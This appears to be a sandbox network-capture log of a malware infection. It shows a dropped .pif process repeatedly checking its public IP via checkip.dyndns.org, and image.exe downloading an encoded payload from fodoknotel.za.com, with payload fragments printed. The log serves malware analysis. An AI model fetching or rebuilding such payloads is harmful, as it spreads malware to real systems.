Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	193.122.130.0	80	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:37.160213947 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:38.365104914 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 37c3db16ac6c73101dade329c0c468ba Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	193.122.130.0	80	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:37.676503897 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 16:05:38.948564053 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7e54f24ce01613d9294c63a75e853763 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	193.122.130.0	80	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:39.167212963 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:39.633395910 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a6a195c52e4101c2908a80fc87a58316 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	193.122.130.0	80	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:39.786648989 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 16:05:40.994121075 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 83294c7297ff12fe4e71db83a9751faf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49756	193.122.130.0	80	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:40.264377117 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:40.720549107 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 79be42c0e20a5c56e340993535bdf278 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	193.122.130.0	80	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:41.558399916 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:42.905512094 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b70cc57291071a5deba324754af2d45f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	193.122.130.0	80	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:41.826998949 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:45.110498905 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5c00bb704a46296e4ab07ac01074dbdb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	193.122.130.0	80	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:43.539006948 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:44.826647043 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2a78b826e5f5c03b18bba4001a92fd15 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49766	193.122.130.0	80	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:45.722193003 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:46.207492113 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3c045c302592cf258770a9dfe9bd17b5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	193.122.130.0	80	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:46.973227024 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:47.776566029 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a9cbedffd78759fa67660dd76f482a6b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49770	193.122.130.0	80	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:48.424592018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:51.029989004 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3dc7dcc639eeeded39a678180e606ab7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	23.237.26.135	443	7276	C:\Users\user\Desktop\image.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:04:58 UTC	166	OUT	GET /233_Pumyophnrer HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: fodoknotel.za.com
2025-01-02 15:04:59 UTC	183	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:04:58 GMT Server: Apache Last-Modified: Tue, 31 Dec 2024 20:10:29 GMT Accept-Ranges: bytes Content-Length: 766628 Connection: close
2025-01-02 15:04:59 UTC	8009	IN	Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 6e 49 68 41 69 47 52 30 66 46 42 63 64 49 68 41 69 4a 68 4d 6e 46 79 4d 61 46 42 67 61 4a 52 30 51 4a 68 34 67 49 78 49 69 4a 68 34 56 4a 68 49 5a 45 51 34 4f 47 78 4d 58 46 42 41 55 45 68 51 69 47 79 63 6a 46 42 34 63 45 67 34 65 47 43 49 55 47 68 53 6d 72 71 56 5a 49 36 65 78 53 2f 30 69 47 69 59 63 48 52 55 62 48 78 49 66 70 71 36 6c 57 53 4f 6e 73 55 74 4c 39 4f 48 36 2b 4e 7a 64 67 65 50 79 2b 75 2f 68 35 6f 42 4c 2f 66 66 6e 36 50 66 35 35 34 37 71 2b 2f 62 66 34 76 4b 54 54 6c 62 68 2b 2b 72 34 38 4f 35 2f 33 39 7a 64 38 2b 2f 77 67 77 70 61 33 2f 6a 35 38 39 33 34 67 2b 6a 7a 33 4f 48 7a 2b 6f 46 4c 57 75 72 76 34 39 7a 65 38 49 54 35 37 2b 54 68 35 66 47 55 2f 56 66 63 33 64 7a 35 35 4e 39 39 38 50 50 30 34 76 48 Data Ascii: pq6lWSOnsUsnIhAiGR0fFBcdIhAiJhMnFyMaFBgaJR0QJh4gIxIiJh4VJhIZEQ4OGxMXFBAUEhQiGycjFB4cEg4eGCIUGhSmrqVZI6exS/0iGiYcHRUbHxIfpq6lWSOnsUtL9OH6+NzdgePy+u/h5oBL/ffn6Pf5547q+/bf4vKTTlbh++r48O5/39zd8+/wgwpa3/j58934g+jz3OHz+oFLWurv49ze8IT57+Th5fGU/Vfc3dz55N998PP04vH
2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 5a 35 61 51 6b 61 51 2f 2f 38 59 62 47 56 79 4a 71 64 73 55 63 48 4f 34 52 39 6d 6c 35 2f 62 52 7a 77 4e 72 63 41 79 56 54 4b 31 66 70 31 38 78 6a 34 79 6e 56 4d 74 58 4c 72 64 49 50 4f 30 49 66 44 70 64 67 70 53 59 51 6e 6f 61 38 49 65 4f 43 68 33 74 50 57 5a 50 51 61 69 4f 42 66 51 59 66 35 63 68 54 31 77 4e 48 35 44 67 49 6a 4f 66 56 71 69 2f 55 6c 69 4c 34 77 53 43 41 49 78 6e 2f 78 71 6a 75 76 78 54 59 72 6b 4b 4d 68 56 33 4e 51 6e 77 67 52 54 6c 6a 53 5a 5a 35 79 6b 69 68 56 41 4c 35 6e 59 72 69 55 61 54 45 30 50 64 57 37 63 4e 67 52 77 6b 5a 34 62 55 4c 62 56 74 79 75 57 73 50 75 58 4c 47 30 2f 41 4e 76 66 6f 67 7a 6f 66 55 4d 79 6c 4e 44 55 79 59 69 30 4f 41 53 6c 74 38 79 44 32 42 38 41 34 65 6e 54 6d 4d 59 6d 35 38 45 48 75 72 58 61 47 30 44 36 Data Ascii: Z5aQkaQ//8YbGVyJqdsUcHO4R9ml5/bRzwNrcAyVTK1fp18xj4ynVMtXLrdIPO0IfDpdgpSYQnoa8IeOCh3tPWZPQaiOBfQYf5chT1wNH5DgIjOfVqi/UliL4wSCAIxn/xqjuvxTYrkKMhV3NQnwgRTljSZZ5ykihVAL5nYriUaTE0PdW7cNgRwkZ4bULbVtyuWsPuXLG0/ANvfogzofUMylNDUyYi0OASlt8yD2B8A4enTmMYm58EHurXaG0D6
2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 4c 6f 33 35 39 38 67 5a 4d 59 32 76 45 45 52 34 58 2b 79 2b 65 51 4d 4a 49 69 66 36 57 30 44 46 4f 77 74 6e 30 4c 61 64 44 4f 32 32 6d 68 41 46 71 74 45 6c 42 44 65 6e 59 59 36 52 6c 49 30 4a 2b 42 37 48 35 4e 75 32 2b 43 67 4d 2f 64 47 71 68 44 55 32 71 4f 59 73 4d 32 45 74 48 44 44 4c 70 4a 34 49 6f 72 6b 59 70 54 32 2b 2f 31 43 48 67 45 2b 4a 79 74 75 77 6b 53 69 43 49 43 50 69 53 46 47 35 61 67 63 4d 30 32 43 4a 79 6a 5a 2b 61 69 44 57 53 63 6b 38 38 51 41 2f 65 76 2b 44 6e 53 48 65 49 75 66 46 46 45 55 48 4f 50 71 79 67 50 35 79 66 69 6d 67 4c 42 5a 4c 51 65 6e 32 6b 38 66 34 41 68 69 35 46 75 61 2f 69 37 65 43 6f 33 44 6e 45 6d 4e 36 2b 38 73 76 71 47 69 73 56 68 4b 33 71 33 74 4a 77 55 59 61 41 4f 78 7a 67 75 64 62 59 4d 70 4f 72 75 38 67 4f 2f 7a Data Ascii: Lo3598gZMY2vEER4X+y+eQMJIif6W0DFOwtn0LadDO22mhAFqtElBDenYY6RlI0J+B7H5Nu2+CgM/dGqhDU2qOYsM2EtHDDLpJ4IorkYpT2+/1CHgE+JytuwkSiCICPiSFG5agcM02CJyjZ+aiDWSck88QA/ev+DnSHeIufFFEUHOPqygP5yfimgLBZLQen2k8f4Ahi5Fua/i7eCo3DnEmN6+8svqGisVhK3q3tJwUYaAOxzgudbYMpOru8gO/z
2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 73 30 68 79 51 55 6d 61 71 34 6c 58 35 57 48 2b 78 32 31 62 4f 49 4e 4b 78 36 4b 75 30 78 46 6c 7a 70 6d 4d 67 54 35 50 6f 73 65 67 2b 75 66 74 39 39 69 39 56 44 62 68 72 32 74 50 4e 44 74 4a 65 43 63 30 4a 69 43 4b 47 76 31 6b 62 52 6a 45 34 57 36 7a 32 32 75 4a 76 45 71 58 47 38 30 46 30 52 65 37 44 6d 43 50 2f 37 6a 65 49 56 66 4a 72 59 67 45 7a 32 64 37 64 4c 65 45 53 50 38 4c 53 48 51 49 56 68 53 6d 79 63 5a 79 39 63 41 6c 71 46 43 70 48 32 6d 34 2b 58 67 30 58 59 48 5a 78 56 4a 6f 53 49 4e 4d 79 2b 56 7a 4e 58 79 47 4b 64 36 66 41 73 53 76 36 42 41 52 43 6e 6d 6b 54 4c 38 4e 66 41 45 79 78 53 44 39 43 4b 55 73 52 30 37 76 44 57 41 37 37 47 68 61 56 35 55 62 4d 78 64 55 4e 43 31 2b 70 53 52 69 77 77 37 2f 6d 77 34 45 53 2f 72 64 79 52 62 53 4d 79 53 Data Ascii: s0hyQUmaq4lX5WH+x21bOINKx6Ku0xFlzpmMgT5Poseg+uft99i9VDbhr2tPNDtJeCc0JiCKGv1kbRjE4W6z22uJvEqXG80F0Re7DmCP/7jeIVfJrYgEz2d7dLeESP8LSHQIVhSmycZy9cAlqFCpH2m4+Xg0XYHZxVJoSINMy+VzNXyGKd6fAsSv6BARCnmkTL8NfAEyxSD9CKUsR07vDWA77GhaV5UbMxdUNC1+pSRiww7/mw4ES/rdyRbSMyS
2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 46 47 33 67 55 74 49 65 36 73 4c 62 43 71 7a 2f 74 45 77 46 49 2b 4a 2b 4f 73 30 47 71 70 71 73 70 71 6b 70 69 4e 58 6c 63 63 77 61 7a 43 45 76 79 34 34 69 5a 69 38 6d 61 56 4a 61 48 5a 70 68 4d 63 33 6d 42 34 65 5a 55 52 66 70 49 59 58 47 2b 39 71 6c 55 4a 59 78 47 39 31 79 5a 4e 36 39 4a 36 56 6b 47 4b 4e 50 5a 76 79 33 73 74 4a 65 36 43 30 59 52 31 55 69 71 53 48 69 42 4a 78 4a 44 61 32 62 68 65 71 45 31 58 49 35 75 51 5a 4a 4c 4c 34 4e 4b 31 4e 51 51 57 67 79 6d 4a 56 43 55 59 6e 72 55 42 4f 6f 79 6c 41 6a 31 67 76 57 32 59 30 37 30 49 52 72 54 4a 4e 7a 71 59 50 2f 6f 6f 4d 4e 6f 4d 6f 32 72 56 62 73 4b 48 50 6f 74 49 31 59 72 39 46 70 2f 6c 59 39 6f 76 4b 78 46 76 43 41 54 70 6c 77 39 54 53 7a 4d 7a 2f 66 76 65 4c 39 46 4f 46 56 72 33 37 57 56 2b 46 Data Ascii: FG3gUtIe6sLbCqz/tEwFI+J+Os0GqpqspqkpiNXlccwazCEvy44iZi8maVJaHZphMc3mB4eZURfpIYXG+9qlUJYxG91yZN69J6VkGKNPZvy3stJe6C0YR1UiqSHiBJxJDa2bheqE1XI5uQZJLL4NK1NQQWgymJVCUYnrUBOoylAj1gvW2Y070IRrTJNzqYP/ooMNoMo2rVbsKHPotI1Yr9Fp/lY9ovKxFvCATplw9TSzMz/fveL9FOFVr37WV+F
2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 6f 53 4c 53 70 45 48 6d 35 66 62 51 37 68 6f 4c 56 68 2f 6e 50 44 6f 33 53 56 4a 38 50 72 43 6b 64 6a 38 75 4e 39 64 70 6c 45 44 55 4f 55 4f 65 65 76 53 70 4a 76 66 4a 65 53 6b 53 61 76 6d 70 65 39 51 49 39 5a 2b 55 77 31 67 38 65 72 68 50 4d 75 4d 39 53 66 6f 36 50 67 76 46 39 2f 41 4f 58 75 32 41 67 35 43 50 53 70 52 73 48 7a 53 4a 6a 47 36 4b 38 55 65 2b 78 42 68 59 41 68 64 47 56 53 58 42 64 58 37 73 54 5a 53 72 54 74 4a 68 6d 47 57 67 4c 49 5a 50 35 48 47 6c 71 51 4c 2b 65 79 43 4d 48 77 37 6b 48 42 36 6b 79 4f 69 31 39 38 4c 74 53 59 64 4b 52 35 2b 58 65 33 4b 48 2f 76 79 6c 36 44 6b 50 71 36 75 39 34 43 71 58 57 36 61 38 51 53 70 43 55 44 31 75 47 62 39 59 55 59 64 6d 78 78 66 32 50 6e 50 4b 34 6d 31 30 71 63 49 65 42 36 42 35 47 69 31 78 2b 68 59 Data Ascii: oSLSpEHm5fbQ7hoLVh/nPDo3SVJ8PrCkdj8uN9dplEDUOUOeevSpJvfJeSkSavmpe9QI9Z+Uw1g8erhPMuM9Sfo6PgvF9/AOXu2Ag5CPSpRsHzSJjG6K8Ue+xBhYAhdGVSXBdX7sTZSrTtJhmGWgLIZP5HGlqQL+eyCMHw7kHB6kyOi198LtSYdKR5+Xe3KH/vyl6DkPq6u94CqXW6a8QSpCUD1uGb9YUYdmxxf2PnPK4m10qcIeB6B5Gi1x+hY
2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 67 4f 2b 2b 52 66 34 5a 38 75 54 46 58 41 33 4e 63 54 6e 58 48 4a 4f 78 43 59 65 66 68 63 72 71 73 31 76 38 73 31 6e 35 63 37 4f 4f 33 48 6a 54 47 48 55 4c 52 4a 6f 47 4e 58 64 34 7a 34 42 64 72 7a 4d 54 58 75 64 30 6a 56 6e 4a 47 74 70 67 41 49 78 51 49 36 51 76 33 4e 69 49 72 43 38 4d 66 30 35 6b 77 6a 33 32 78 56 58 63 64 6d 30 76 59 6b 6c 59 43 44 62 68 71 63 2b 63 59 6a 49 61 76 33 78 54 6d 64 74 31 55 65 6b 6d 71 37 7a 43 41 2b 50 6b 6c 51 46 62 4a 5a 53 4c 5a 70 6e 68 78 34 77 54 4f 5a 62 6a 6c 52 4f 4d 51 6e 41 6f 4d 4a 35 7a 4b 70 4c 66 56 31 64 2b 72 62 6c 34 4f 43 65 70 6b 66 41 33 30 37 54 78 6e 2b 32 75 2f 5a 67 2b 75 4d 79 43 64 32 50 67 70 44 62 70 55 69 2f 6c 4f 74 55 4d 58 65 43 4a 44 74 41 6c 52 2f 5a 4b 44 66 4b 4d 32 68 4a 42 79 5a 58 Data Ascii: gO++Rf4Z8uTFXA3NcTnXHJOxCYefhcrqs1v8s1n5c7OO3HjTGHULRJoGNXd4z4BdrzMTXud0jVnJGtpgAIxQI6Qv3NiIrC8Mf05kwj32xVXcdm0vYklYCDbhqc+cYjIav3xTmdt1Uekmq7zCA+PklQFbJZSLZpnhx4wTOZbjlROMQnAoMJ5zKpLfV1d+rbl4OCepkfA307Txn+2u/Zg+uMyCd2PgpDbpUi/lOtUMXeCJDtAlR/ZKDfKM2hJByZX
2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 55 65 6e 70 59 67 4e 77 2f 64 45 6c 39 55 62 4e 31 4c 78 56 35 6c 72 77 2b 31 53 55 71 37 6d 69 78 6c 48 58 34 78 31 64 69 7a 70 4d 73 52 65 6c 6d 55 2b 35 5a 34 6e 76 41 6e 39 65 32 68 77 45 6e 50 55 51 32 76 75 35 6f 75 48 43 78 67 41 37 65 63 62 6a 66 34 36 37 44 66 46 37 78 6a 63 72 58 36 48 49 6e 4d 79 33 71 4f 52 70 57 2f 48 43 61 67 45 71 44 74 4b 7a 4a 31 58 6a 56 78 4f 78 66 54 6d 67 79 61 6d 41 34 45 57 72 56 71 73 67 32 4b 36 5a 73 46 69 50 41 47 65 7a 73 48 6d 55 58 50 6b 50 45 37 47 2f 5a 4b 6f 4f 4c 59 34 77 6a 73 33 51 4d 35 56 69 4a 71 43 76 51 72 52 30 48 42 4f 4e 37 7a 79 75 5a 56 35 34 33 46 46 37 46 65 7a 47 52 41 6b 58 55 44 31 72 67 44 31 57 36 57 64 44 43 55 44 41 57 2b 56 43 50 55 2b 77 63 73 36 55 4f 47 71 37 4d 6f 68 6c 5a 50 49 Data Ascii: UenpYgNw/dEl9UbN1LxV5lrw+1SUq7mixlHX4x1dizpMsRelmU+5Z4nvAn9e2hwEnPUQ2vu5ouHCxgA7ecbjf467DfF7xjcrX6HInMy3qORpW/HCagEqDtKzJ1XjVxOxfTmgyamA4EWrVqsg2K6ZsFiPAGezsHmUXPkPE7G/ZKoOLY4wjs3QM5ViJqCvQrR0HBON7zyuZV543FF7FezGRAkXUD1rgD1W6WdDCUDAW+VCPU+wcs6UOGq7MohlZPI
